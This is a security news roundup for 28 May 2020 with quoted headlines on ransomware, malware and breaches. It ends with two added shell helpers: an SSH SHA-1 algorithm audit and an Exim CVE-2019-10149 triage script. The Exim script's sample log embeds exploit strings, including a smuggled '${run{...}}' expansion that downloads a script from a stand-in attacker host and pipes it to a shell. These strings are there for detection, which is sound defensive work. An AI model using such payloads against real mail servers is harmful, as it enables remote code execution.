Cyber Security News for 28May2020

#security #cybersecurity #itsecurity #privacy #risk #compliance #openssh #threathunting #valak #malware #vandathegod #immuniweb #redelk #ansible #redteam #devops #cybercrime #robertoescobar #apple #ponyfinal #googletag #netwalker #raas #bluemockingbird #trickbot #mworm #nworm #pagelayer #wordpress #exim #sandwormteam #valorant #Hoaxcalls #botnet
Image by https://tripwire.com
  1. “Cyber criminals create fake online stores that mimic the look of real sites or that use the names of well-known stores or brands. When you search for the best online deals, you may find yourself at one of these fake sites. By purchasing from such websites, you can end up with counterfeit or stolen items, and in some cases, your purchases might never be delivered.” https://www.sans.org/security-awareness-training/resources/shopping-online-securely-1
  2. “The truth is that the impetus to scale up quickly has left many organisations without a complete inventory of what devices are now within their corporate infrastructure. Organizations, therefore, need a way of passively discovering a complete list of their assets within a short amount of time.” https://www.tripwire.com/state-of-security/featured/business-continuity-infrastructure-continuity-remote-working/
  3. “About 150 organizations in the financial, retail, manufacturing, and health care sectors have been targeted by the Valak malware since it emerged late last year, the researchers said. More than just a “loader” that delivers malicious code, Valak can also be used to siphon off data from enterprise networks, they concluded. In more than two-thirds of the attacks, Valak was still being delivered with other pieces of malware.” https://www.cyberscoop.com/valak-malware-cybereason-data-theft/
  4. “Organizations can adopt two cybersecurity stances to strengthen and improve their cybersecurity posture; the first (reactive), is to acquire traditional detection and prevention methods such as IDS, IPS, firewalls, and SIEM whereas the second (proactive) is to use offensive tactics, i.e. those found in threat-hunting programs.” https://www.threathunting.se/2020/05/28/who-is-a-threat-hunter-and-what-role-do-they-play/
  5. “OpenSSH, the most popular utility for connecting to and managing remote servers, has announced today plans to drop support for its SHA-1 authentication scheme.” https://www.blackhatethicalhacking.com/news/openssh-to-deprecate-sha-1-logins-due-to-security-risk/
  6. “It’s one thing for hackers to target websites and proudly announce it on social media platforms for all to see. It’s, however, an entirely different thing to leave a digital trail that leads cybersecurity researchers right to their doorsteps. That’s exactly what happened in the case of a hacktivist going by the name VandaTheGod, to whom a series of attacks on government websites has been attributed since July 2019.” https://thehackernews.com/2020/05/brazilian-hacker-vandathegod.html
  7. “ImmuniWeb says that its Deep Learning AI technology is capable of distinguishing and removing duplicates and fake records, providing actionable and risk-scored data to its clients.” https://thehackernews.com/2020/05/dark-web-monitoring-tool.html
  8. “As the red team infrastructure needs continue to expand (and grow more complicated), so does the need for infrastructure automation. Red teams are adopting DevOps to improve the speed at which their infrastructure is deployed, hence the rise in usage of tools such as Terraform and Ansible for red teams. In this post, we will use Ansible to deploy the RedELK infrastructure visibility tool across a red team infrastructure.” https://www.trustedsec.com/blog/automating-a-redelk-deployment-using-ansible/
  9. “In recent years, invading private networks has become a favorite pastime among cybercriminals. If unwelcome visitors are able to find their way onto your home network, the consequences can be far-reaching and difficult to remedy. Data theft, privacy breaches and compromised information are just a few potential consequences of failing to secure your home network. Fortunately, a little bit of forethought and security knowhow can go a long way when it comes to bolstering your network’s defenses. Anyone looking to keep cybercriminals and other third parties far away from their home network should consider the following measures.” https://hackercombat.com/effective-ways-to-bolster-your-home-networks-defenses/
  10. “Cybercrime is any criminal activity in which a computer or network device is the target and/or the tool. Some cyber crimes directly attack computers or other devices to disable them. In others, cyber criminals use computers for their own purposes: to distribute malicious program code, obtain illegal information, or obtain cryptocurrency. Dividing cybercrimes into separate categories is not easy, as there are many of them. That’s why students often ask for professional help from a paper writing service when they need to write about cyber crimes.” https://hackercombat.com/the-process-of-investigating-cyber-crimes/
  11. “Roberto Escobar’s company has reportedly filed a $2.6 billion lawsuit against Apple for purportedly having lame-o security – security so bad, his address purportedly got leaked through FaceTime and has led to subsequent assassination attempts.” https://nakedsecurity.sophos.com/2020/05/28/pablo-escobars-brother-sues-apple-for-2-6b-over-facetime-flaw/
  12. “Microsoft Security Intelligence revealed it had observed human-operated campaigns lying in wait for the right moment to deploy PonyFinal ransomware as their final payload. In their operations, the attackers used brute force attacks against a targeted organization’s systems management server as a means to initially gain access. They then deployed a VBScript to run a PowerShell reverse shell. This asset helped the malicious actors execute data dumps.” https://www.tripwire.com/state-of-security/security-data-protection/ponyfinal-ransomware-delivered-by-extended-human-operated-attacks/
  13. “The Google Threat Analysis Group (TAG) is a group inside Google’s security team that tracks operations conducted by nation-state actors and cybercrime groups. Google TAG has published today its first TAG quarterly report, the Q1 2020 TAG Bulletin, that provides insights on the campaigns monitored in the first quarter of 2020.” https://securityaffairs.co/wordpress/103924/hacking/google-tag-report-q1.html
  14. “Security intelligence — spanning across your entire security strategy — isn’t just for security operations and vulnerability management teams. It empowers security functions throughout the organization to make better, faster decisions and amplify their impact — all the way up to the CISO. Senior security leaders can leverage actionable intelligence to identify real risks and guide critical planning and investment decisions.” https://www.recordedfuture.com/security-decision-making/
  15. “Faced with a Godzilla-like rampage of coronavirus (COVID-19)-related cyber attacks, state and local governments are taking another run at Congress to help shore up their cybersecurity defenses with badly needed funding, a new report said.” https://www.msspalert.com/cybersecurity-markets/verticals/states-ask-congress-for-funding/
  16. “Cisco Talos is releasing the 1.0 beta version of Dynamic Data Resolver (DDR) — a plugin for IDA that makes reverse-engineering malware easier. DDR is using instrumentation techniques to resolve dynamic values at runtime from the sample. For the 1.0 release, we have fixed a couple of bugs, ported it to the latest IDA version, added multiple new features, plus a new installer script that automatically resolves all dependencies.” https://blog.talosintelligence.com/2020/05/dynamic-data-resolver-1-0.html
  17. “Security researchers have found a new malware that finds and backdoors open-source NetBeans projects hosted on the GitHub web-based code hosting platform to spread to Windows, Linux, and macOS systems and deploy a Remote Administration Tool (RAT).  The malware dubbed Octopus Scanner by researchers at the GitHub Security Lab compromises developers’ computers by infecting their NetBeans repositories after planting malicious payloads within JAR binaries, project files and dependencies, later spreading to downstream development systems.” https://www.bleepingcomputer.com/news/security/new-octopus-scanner-malware-spreads-via-github-supply-chain-attack/
  18. “The “synchronized and organized attack” on civilian infrastructure was aimed at disrupting the industrial computers that underpin Israeli water facilities, said Yigal Unna, head of Israel’s National Cyber Directorate, in the most extensive public comments from an Israeli official yet on the incident. Damage could have been done to those systems if Israeli authorities hadn’t foiled the attack, Unna claimed.” https://www.cyberscoop.com/israel-cyberattacks-water-iran-yigal-unna/
  19. “The lawsuit, filed against Google by Arizona’s Attorney General, alleges that the tech giant uses “deceptive and unfair conduct” to obtain users’ location data.  Google has been hit by a lawsuit alleging that it violates user privacy by collecting location data via various means – and claiming that Google makes it nearly “impossible” for users to opt out of such data tracking.” https://threatpost.com/google-location-tracking-arizona-lawsuit/156082/
  20. “Michigan State University received a deadline to pay ransomware attackers under the threat that files stolen from the institution’s network will be leaked to the public.  The demand is from Netwalker ransomware-as-a-service (RaaS) operators, a group that recently started to recruit skilled network intruders for their affiliate program.” https://www.bleepingcomputer.com/news/security/michigan-state-university-network-breached-in-ransomware-attack/
  21. “This month news broke about a hacker group, namely Blue Mockingbird, exploiting a critical vulnerability in Microsoft IIS servers to plant Monero (XMR) cryptocurrency miners on compromised machines.  According to the security firm Red Canary, the estimated number of infections is thought to have surpassed 1,000.” https://www.bleepingcomputer.com/news/security/microsoft-iis-servers-hacked-by-blue-mockingbird-to-mine-monero/
  22. “Minted, a US-based marketplace for independent artists, has disclosed a data breach after a hacker sold a database containing 5 million user records on a dark web marketplace. Minted is an online marketplace that allows independent artists to submit their art, which is then voted on by the Minted community. The winning submissions are then sold as art, home décor, and stationery to consumers. Earlier this month, BleepingComputer reported that a hacking group named Shiny Hunters was selling the user records for eleven companies on a dark web marketplace.” https://www.bleepingcomputer.com/news/security/minted-discloses-data-breach-after-5m-user-records-sold-online/
  23. “First discovered in 2016, TrickBot is an information stealer that provides backdoor access sometimes used by criminal groups to distribute other malware. TrickBot uses modules to perform different functions, and one key function is propagating from an infected Windows client to a vulnerable Domain Controller (DC). TrickBot currently uses three modules for propagation. As early as April 2020, TrickBot updated one of its propagation modules known as “mworm” to a new module called “nworm.” Infections caused through nworm leave no artifacts on an infected DC, and they disappear after a reboot or shutdown.” https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/
  24. “Two high severity security vulnerabilities found in the PageLayer plugin can let attackers potentially wipe the contents of or take over WordPress sites using vulnerable plugin versions. PageLayer is a WordPress plugin with over 200,000 active installations according to numbers available on its WordPress plugins repository entry. It can help users without developer or designer skills build web pages using a browser-based drag-and-drop real-time editor.” https://www.bleepingcomputer.com/news/security/200k-sites-with-buggy-wordpress-plugin-exposed-to-wipe-attacks/
  25. “Russian military cyber actors, publicly known as Sandworm Team, have been exploiting a vulnerability in Exim mail transfer agent (MTA) software since at least last August,” reads the advisory published by the NSA. “The Russian actors, part of the General Staff Main Intelligence Directorate’s (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker’s dream access – as long as that network is using an unpatched version of Exim MTA.” https://securityaffairs.co/wordpress/103948/apt/nsa-sandworm-exim-attacks.html
  26. “A judge in the U.S. District Court for the Eastern District of Virginia ruled Tuesday that attorneys suing Capital One on behalf of customers could review a copy of an incident response report to prepare for a possible trial. The Virginia-based bank had sought to keep the report private on the grounds that it was protected under legal doctrine. Yet U.S. Magistrate Judge John Anderson said the report, prepared by Mandiant, was the result of a business agreement, and that the legal doctrine argument was “unpersuasive.”” https://www.cyberscoop.com/capital-one-breach-mandiant-report-judge-ruling/
  27. “As the eagerly anticipated tactical FPS game Valorant ends its closed beta, a fake mobile version is being distributed that displays nothing but scams to those who install it. Riot Games’ Valorant ended closed beta today as they prepare for their official launch on June 2nd, 2020. Initially being launched for the PC, Valorant is not available for mobile devices as of yet, though they have stated they are looking into it for the future.” https://www.bleepingcomputer.com/news/security/fake-valorant-mobile-app-pushes-scams-on-eager-gamers/
  28. “Cisco said today that some of its Cisco Virtual Internet Routing Lab Personal Edition (VIRL-PE) backend servers were hacked by exploiting critical SaltStack vulnerabilities patched last month.” https://www.bleepingcomputer.com/news/security/cisco-hacked-by-exploiting-vulnerable-saltstack-servers/
  29. “The Hoaxcalls botnet, built to carry out large-scale distributed denial-of-service (DDoS) attacks, has been actively in development since the beginning of the year. One of its hallmarks is that it uses different vulnerability exploits for initial compromise.” https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/
  30. “Hackers earlier this month breached the computer systems of Japanese data-management company NTT Communications in an incident that could affect 621 clients, the company said Thursday.” https://www.cyberscoop.com/ntt-hack-japan-customer-data/
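
Item 5 is about OpenSSH retiring the ssh-rsa signature algorithm, that is, RSA signatures hashed with SHA-1; RSA keys themselves keep working through the rsa-sha2-256 and rsa-sha2-512 algorithms, so what actually breaks is any peer that offers only the SHA-1 name. The POSIX shell helper below is an added example, not code from the article or from the OpenSSH project: it audits an algorithm list (the output of `ssh -Q key` on a reasonably recent client, or the value of a HostKeyAlgorithms or PubkeyAcceptedKeyTypes directive, comma- or newline-separated) and reports whether RSA authentication would fail outright once ssh-rsa is disabled. The two sample lists are constructed for the demo.

```shell
#!/bin/sh
# Added example, not from the article or the OpenSSH project. Audits an SSH
# algorithm list for dependence on ssh-rsa (RSA signatures over SHA-1). The list
# can be the output of `ssh -Q key` on a client or the value of a
# HostKeyAlgorithms / PubkeyAcceptedKeyTypes directive, comma- or newline-separated.
# Sample lists below are constructed.

# Names that are RSA-over-SHA-1 and go away with the deprecation.
SHA1_RSA_ALGS='ssh-rsa ssh-rsa-cert-v01@openssh.com'
# RSA names that stay: the same RSA keys, signed with SHA-256 or SHA-512.
SHA2_RSA_ALGS='rsa-sha2-256 rsa-sha2-512 rsa-sha2-256-cert-v01@openssh.com rsa-sha2-512-cert-v01@openssh.com'

# normalise "$list": one trimmed name per line, deduplicated.
normalise() {
  printf '%s\n' "$1" | tr ',' '\n' \
    | sed 's/^[[:space:]]*//; s/[[:space:]]*$//' | grep -v '^$' | sort -u
}

# has_alg "$list" name: true if name appears in the list (exact, whole-name match).
has_alg() {
  normalise "$1" | grep -qxF -- "$2"
}

# sha1_names_in "$list": print the SHA-1 RSA names the list still offers.
sha1_names_in() {
  for a in $SHA1_RSA_ALGS; do
    if has_alg "$1" "$a"; then printf '%s\n' "$a"; fi
  done
}

# sha1_rsa_only "$list": true if the list offers ssh-rsa but none of the
# rsa-sha2-* names, i.e. RSA authentication breaks outright once ssh-rsa is
# disabled instead of quietly negotiating the SHA-2 variant.
sha1_rsa_only() {
  has_sha1=1; has_sha2=1
  for a in $SHA1_RSA_ALGS; do
    if has_alg "$1" "$a"; then has_sha1=0; fi
  done
  for a in $SHA2_RSA_ALGS; do
    if has_alg "$1" "$a"; then has_sha2=0; fi
  done
  if [ "$has_sha1" -eq 0 ] && [ "$has_sha2" -eq 1 ]; then
    return 0
  fi
  return 1
}

# report "$list": one-line verdict for a list.
report() {
  if sha1_rsa_only "$1"; then
    echo "BREAKS: only SHA-1 RSA offered ($(sha1_names_in "$1" | tr '\n' ' '))"
  elif [ -n "$(sha1_names_in "$1")" ]; then
    echo "OK, SHA-2 fallback present, but still advertises: $(sha1_names_in "$1" | tr '\n' ' ')"
  else
    echo "OK: no SHA-1 RSA names"
  fi
}

# Constructed inputs: what a current client lists, and a legacy-only directive value.
MODERN_CLIENT='ssh-ed25519
ecdsa-sha2-nistp256
rsa-sha2-512
rsa-sha2-256
ssh-rsa'
LEGACY_VALUE='ssh-rsa,ssh-dss'

report "$MODERN_CLIENT"
report "$LEGACY_VALUE"
# On a live client: report "$(ssh -Q key)"
```

To exercise a server before the default flips, connect with the SHA-1 name left out, for example `ssh -o PubkeyAcceptedKeyTypes=rsa-sha2-512,rsa-sha2-256 -o HostKeyAlgorithms=rsa-sha2-512,rsa-sha2-256,ssh-ed25519 user@host`; if that fails while a plain `ssh` succeeds, the server (or a certificate signed with ssh-rsa) still depends on the SHA-1 algorithm and needs attention, not the key itself.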

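Item 25 concerns the Exim bug the NSA advisory names, CVE-2019-10149: remote command execution affecting Exim 4.87 through 4.91 and fixed in 4.92, whose public exploit smuggles an Exim `${run{...}}` string expansion into the local part of a recipient address. The shell helpers below are an added example, not code from the advisory or the article: one classifies an `exim -bV` banner against the affected range, the other counts main-log lines carrying that expansion marker. The banners and log lines are constructed for the demo and are not real captures.

```shell
#!/bin/sh
# Added example, not from the NSA advisory or the article: quick triage for
# CVE-2019-10149 on a host running Exim. Needs only sh, awk, grep and mktemp.
# All banners and log lines used here are constructed for the demo.

# exim_vulnerable "banner": "banner" is the first line printed by `exim -bV`,
# e.g. "Exim version 4.91 #1 built ...". Returns 0 if the version is inside the
# affected range 4.87..4.91 (fixed in 4.92), 1 if not, 2 if the line is not an
# Exim banner at all.
exim_vulnerable() {
  ver=$(printf '%s\n' "$1" | awk '/^Exim version/ { print $3; exit }')
  [ -n "$ver" ] || return 2
  major=${ver%%.*}            # "4" from "4.91"
  rest=${ver#*.}              # "91" (or "91_RC1", "92.3", ...)
  minor=${rest%%[!0-9]*}      # leading digits only
  if [ "$major" -eq 4 ] && [ "$minor" -ge 87 ] && [ "$minor" -le 91 ]; then
    return 0
  fi
  return 1
}

# exim_log_hits "file": number of log lines containing the ${run{...}} string
# expansion that the public exploit places in the local part of a recipient
# address. Searched as a fixed string so the $ and braces are taken literally.
exim_log_hits() {
  grep -c -F '${run{' "$1" || true
}

# Constructed sample mainlog: two exploit attempts, one ordinary delivery.
# Prints the path of the temporary file it wrote.
make_sample_log() {
  f=$(mktemp) || return 1
  cat >"$f" <<'EOF'
2019-06-05 10:14:02 1hYcvo-0004Kz-2b <= root@attacker.example H=(attacker) [203.0.113.10] P=esmtp S=421
2019-06-05 10:14:02 1hYcvo-0004Kz-2b ** ${run{/bin/sh -c "wget -O- http://203.0.113.10/x | sh"}}@localhost: Unrouteable address
2019-06-05 10:15:30 1hYcxA-0004L4-1c <= alice@example.org H=mail.example.org [198.51.100.5] P=esmtps S=1530
2019-06-05 10:15:31 1hYcxA-0004L4-1c => bob <bob@example.net> R=dnslookup T=remote_smtp H=mx.example.net [198.51.100.20]
2019-06-05 10:16:00 1hYcxe-0004L9-0p ** ${run{/usr/bin/id}}@localhost: Unrouteable address
EOF
  printf '%s\n' "$f"
}

# Demo run. On a real host use: exim_vulnerable "$(exim -bV 2>/dev/null | head -n 1)"
# and point exim_log_hits at /var/log/exim4/mainlog (Debian) or /var/log/exim/main.log.
for banner in 'Exim version 4.91 #1 built 01-Jan-2019 00:00:00' \
              'Exim version 4.92 #3 built 01-Jan-2019 00:00:00'; do
  if exim_vulnerable "$banner"; then
    echo "VULNERABLE: $banner"
  else
    echo "not affected: $banner"
  fi
done
log=$(make_sample_log)
echo "exploit markers in sample log: $(exim_log_hits "$log")"
rm -f "$log"
```

A zero count from the log scan is not a clean bill of health: a patched build only stops the expansion from executing, and an attacker who already landed can remove log lines, so pair the version check with a look for the unexpected privileged users and altered network settings the advisory describes.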